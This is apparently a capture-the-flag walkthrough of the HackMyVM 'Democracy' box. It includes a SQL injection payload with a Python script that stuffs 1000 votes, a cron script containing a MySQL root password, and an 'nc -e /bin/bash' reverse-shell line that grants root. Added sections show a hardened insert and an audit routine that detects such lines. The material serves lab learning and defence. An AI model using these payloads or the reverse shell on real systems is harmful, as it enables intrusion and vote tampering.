HackMyVM Democracy: Detailed Box Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Detection

Port 80 is seen to be open.

❯ ip=192.168.56.109
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.109:80
Open 192.168.56.109:22
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 16:15 CST
Initiating Ping Scan at 16:15
Scanning 192.168.56.109 [4 ports]
Completed Ping Scan at 16:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:15
Completed Parallel DNS resolution of 1 host. at 16:15, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:15
Scanning 192.168.56.109 [2 ports]
Discovered open port 80/tcp on 192.168.56.109
Discovered open port 22/tcp on 192.168.56.109
Completed SYN Stealth Scan at 16:15, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.56.109
Host is up, received echo-reply ttl 63 (0.0012s latency).
Scanned at 2024-12-10 16:15:28 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

At a glance it looks like some kind of voting site. Clicking through to vote brings up a login box; since there is a registration feature, register an account first.

image

It asks you which party to vote for.

image

The home page says that the first party to reach 1000 votes wins. Manually creating 1000 accounts and casting a vote with each is not practical.

image

So capture the request while voting to see whether it can be tampered with; the request turns out to carry a parameter.

image

Following other players' writeups, this parameter can be modified through SQL injection.

candidate=democrat')+union+SELECT+1,"democrat"+--+-

Use a UNION query to add one to the vote count; generate a thousand of them with Python, paste the result into Burp Suite, and forward the intercepted request.

#!/bin/python3

# Payload prefix: closes the string and parenthesis of the original query
result = "democrat')+"

# Append one UNION SELECT per vote; 1000 of them to reach the winning total
for i in range(1, 1001):
    result = result + 'union+SELECT+' + str(i) + ',"democrat"+'

# Comment out the remainder of the original query
result = result + "--+-"

print(result)

The result comes back as Done.
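The reason one request can add more than one vote is that the candidate value is concatenated into the SQL text, so a UNION inside it appends rows the user never cast. The following is an added example, not code from the box or from the writeup: the server-side query, table schema and candidate list of the real application are not on the page, so the concatenation-style insert, the votes table and the allowlist below are all assumptions. It runs the writeup's payload (decoded from form encoding) against an in-memory SQLite table, shows the inflated tally, and contrasts it with a hardened version that allowlists the candidate, binds it as a parameter and lets a PRIMARY KEY enforce one vote per user. SQLite does not treat "democrat" as a string literal the way MySQL does, so the vulnerable path is exercised with a single-quoted variant of the same payload.

```python
import sqlite3
import urllib.parse

# Constructed allowlist of valid candidates; the box's real list is an assumption.
ALLOWED_CANDIDATES = frozenset({"democrat", "republican"})

# The injected value from the writeup, exactly as it appears in the request body.
PAGE_PAYLOAD = 'democrat\')+union+SELECT+1,"democrat"+--+-'


def decode_form_value(raw):
    """Undo form encoding ('+' for space, %xx escapes) the way the server would."""
    return urllib.parse.unquote_plus(raw)


# SQLite quirk: "democrat" is an identifier first, so the vulnerable path uses a
# single-quoted variant of the page's payload (same structure, MySQL-equivalent).
SQLITE_VARIANT = decode_form_value(PAGE_PAYLOAD).replace('"democrat"', "'democrat'")


def new_db():
    """In-memory stand-in for the voting database: one row per vote (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE votes ("
        " user_id INTEGER PRIMARY KEY,"  # one vote per registered user
        " candidate TEXT NOT NULL)"
    )
    return conn


def cast_vote_vulnerable(conn, user_id, candidate):
    """Hypothetical insert built by string concatenation (the box's real server
    code is not on the page). The candidate value becomes part of the SQL text."""
    sql = (f"INSERT INTO votes (user_id, candidate) "
           f"VALUES ({int(user_id)}, '{candidate}')")
    conn.execute(sql)
    conn.commit()


def cast_vote_hardened(conn, user_id, candidate):
    """Allowlist the value, bind it as a parameter, and let the PRIMARY KEY
    enforce one vote per user; each layer on its own stops the writeup's trick."""
    if candidate not in ALLOWED_CANDIDATES:
        raise ValueError(f"unknown candidate: {candidate!r}")
    try:
        conn.execute(
            "INSERT INTO votes (user_id, candidate) VALUES (?, ?)",
            (int(user_id), candidate),
        )
    except sqlite3.IntegrityError:
        raise PermissionError(f"user {user_id} has already voted") from None
    conn.commit()


def count_votes(conn, candidate):
    row = conn.execute(
        "SELECT COUNT(*) FROM votes WHERE candidate = ?", (candidate,)
    ).fetchone()
    return row[0]


def democrat_votes_after_one_request(cast, candidate_value):
    """Fresh database, one request from user 7, then the democrat tally."""
    conn = new_db()
    cast(conn, 7, candidate_value)
    return count_votes(conn, "democrat")


def hardened_rejects(candidate_value):
    """True when the hardened path refuses the value before touching the database."""
    try:
        democrat_votes_after_one_request(cast_vote_hardened, candidate_value)
    except ValueError:
        return True
    return False


def second_vote_rejected():
    """True when the same user cannot vote twice and the tallies stay at one and zero."""
    conn = new_db()
    cast_vote_hardened(conn, 7, "democrat")
    try:
        cast_vote_hardened(conn, 7, "republican")
    except PermissionError:
        return count_votes(conn, "democrat") == 1 and count_votes(conn, "republican") == 0
    return False


if __name__ == "__main__":
    print("vulnerable, honest vote:", democrat_votes_after_one_request(cast_vote_vulnerable, "democrat"))
    print("vulnerable, injected   :", democrat_votes_after_one_request(cast_vote_vulnerable, SQLITE_VARIANT))
    print("hardened, honest vote  :", democrat_votes_after_one_request(cast_vote_hardened, "democrat"))
    print("hardened, injected     : rejected =", hardened_rejects(decode_form_value(PAGE_PAYLOAD)))
    print("hardened, second vote  : rejected =", second_vote_rejected())
```

The single injected request yields two democrat rows in the vulnerable table (the user's own row plus the one from the UNION), and the thousand-row payload generated by the script above inflates the tally the same way. In the hardened version the allowlist rejects it before any SQL runs; even without the allowlist, a bound parameter would store the whole string as a literal candidate name that matches nothing, and the PRIMARY KEY caps each account at one vote.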

image

Scanning the target's ports again shows one more open port: FTP on 21.

❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.109:21
Open 192.168.56.109:22
Open 192.168.56.109:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 16:55 CST
Initiating Ping Scan at 16:55
Scanning 192.168.56.109 [4 ports]
Completed Ping Scan at 16:55, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 192.168.56.109 [3 ports]
Completed SYN Stealth Scan at 16:55, 1.23s elapsed (3 total ports)
Nmap scan report for 192.168.56.109
Host is up, received echo-reply ttl 63 (0.00080s latency).
Scanned at 2024-12-10 16:55:06 CST for 1s

PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
22/tcp filtered ssh no-response
80/tcp filtered http no-response

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
Raw packets sent: 10 (416B) | Rcvd: 1 (28B)

Anonymous login works (user Anonymous); there is a file called votes, which is downloaded to Kali with get.

❯ ftp anonymous@$ip
Connected to 192.168.56.109.
220 ProFTPD Server (Debian) [::ffff:192.168.56.109]
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33883|)
150 Opening ASCII mode data connection for file list
-rwxrwxrwx 1 root root 258 Apr 30 2023 votes
226 Transfer complete
ftp> get votes
local: votes remote: votes
229 Entering Extended Passive Mode (|||63117|)
150 Opening BINARY mode data connection for votes (258 bytes)
100% |*********************************************************************************************************| 258 211.90 KiB/s 00:00 ETA
226 Transfer complete
258 bytes received in 00:00 (97.46 KiB/s)
ftp>
ftp> quit
221 Goodbye.
cat votes
#! /bin/bash

## this script runs every minute ##

#!/bin/bash

mysql -u root -pYklX69Vfa voting << EOF

SELECT COUNT(*) FROM votes WHERE candidate='republican';

SELECT COUNT(*) FROM votes WHERE candidate='democrat';

EOF

nc -e /bin/bash 192.168.0.29 4444

Looking at the file, this script runs on a schedule, once every minute, and its last line is an nc connection.

Change the IP to your own and try to get a reverse shell.

If you are running Kali under WSL with NAT networking, the shell will not come back.

Switch to Kali in VMware, bridged to the VirtualBox host-only adapter.

Then the shell comes through.
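Everything that makes this script the way in is visible in the listing and the file itself: it is root-owned yet world-writable and served over anonymous FTP, it carries the MySQL root password on the command line, and it ends with an outbound nc -e. The following is an added example, not part of the writeup or the box: a small audit routine that takes a scheduled script's text and mode and reports those three indicators, run over the votes file embedded as sample input (its 0777 mode comes from the FTP listing) and over a constructed clean counterpart that reads credentials from a defaults file instead. The indicator patterns and the clean script's paths are assumptions.

```python
import re
import stat

# The 'votes' script retrieved over anonymous FTP in the writeup, embedded as the
# sample input; its mode (-rwxrwxrwx, owner root) is taken from the FTP listing.
VOTES_SCRIPT = """#! /bin/bash

## this script runs every minute ##

mysql -u root -pYklX69Vfa voting << EOF

SELECT COUNT(*) FROM votes WHERE candidate='republican';

SELECT COUNT(*) FROM votes WHERE candidate='democrat';

EOF

nc -e /bin/bash 192.168.0.29 4444
"""
VOTES_MODE = 0o777

# Constructed counter-example: the same count job without the three problems
# (credentials in a root-only defaults file, no callback, 0700 permissions).
CLEAN_SCRIPT = """#!/bin/bash
mysql --defaults-extra-file=/etc/voting/count.cnf voting < /etc/voting/count.sql
"""
CLEAN_MODE = 0o700

# Indicator name -> pattern; one finding per matching indicator (assumed set).
PATTERNS = [
    ("hardcoded-db-password",
     re.compile(r"\bmysql\b[^\n]*\s-p\S+")),            # password glued to -p
    ("reverse-shell-primitive",
     re.compile(r"\bnc\b[^\n]*\s-e\s+/bin/(?:ba)?sh"    # nc -e /bin/bash
                r"|/dev/tcp/"                           # bash /dev/tcp redirection
                r"|\bsocat\b[^\n]*\bexec:")),           # socat exec: forms
]


def audit_script(text, mode):
    """Return the list of findings for a scheduled script given its text and mode.
    A job that others can write is a finding on its own, regardless of content:
    whoever can edit it decides what the scheduler runs next minute."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable-by-others")
    for name, pattern in PATTERNS:
        if pattern.search(text):
            findings.append(name)
    return findings


def redact_db_passwords(text):
    """Replace -p<password> with -p<redacted> so findings can be logged safely."""
    return re.sub(r"(\bmysql\b[^\n]*\s-p)\S+", r"\1<redacted>", text)


if __name__ == "__main__":
    for label, script, mode in (("votes", VOTES_SCRIPT, VOTES_MODE),
                                ("clean", CLEAN_SCRIPT, CLEAN_MODE)):
        print(label, oct(mode), audit_script(script, mode) or ["no findings"])
    print(redact_db_passwords(VOTES_SCRIPT))
```

The order of the findings for the votes file mirrors the order in which a reviewer would fix them: tighten the mode first (and stop exporting the directory over anonymous FTP), move the credential out of the command line where ps and shell history can see it, and remove the outbound shell. The redaction helper exists so the audit output itself does not spread the password further.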

Root Privilege Escalation

User-level privilege escalation is skipped entirely: the shell that comes back is already root, so that step is saved.

After stabilizing the terminal, just read the flags and it's done.

root@democracy:~# ls
root.txt typescript
root@democracy:~# cat root.txt
081c1bc3fe537326ad7bcb8e571b1f5h
root@democracy:~# cat /home/trump/user.txt
399dba2fcf50acb2110f5e44380d20e4
root@democracy:~#

The key part of this box is the voting section; with a better approach there, it isn't hard.
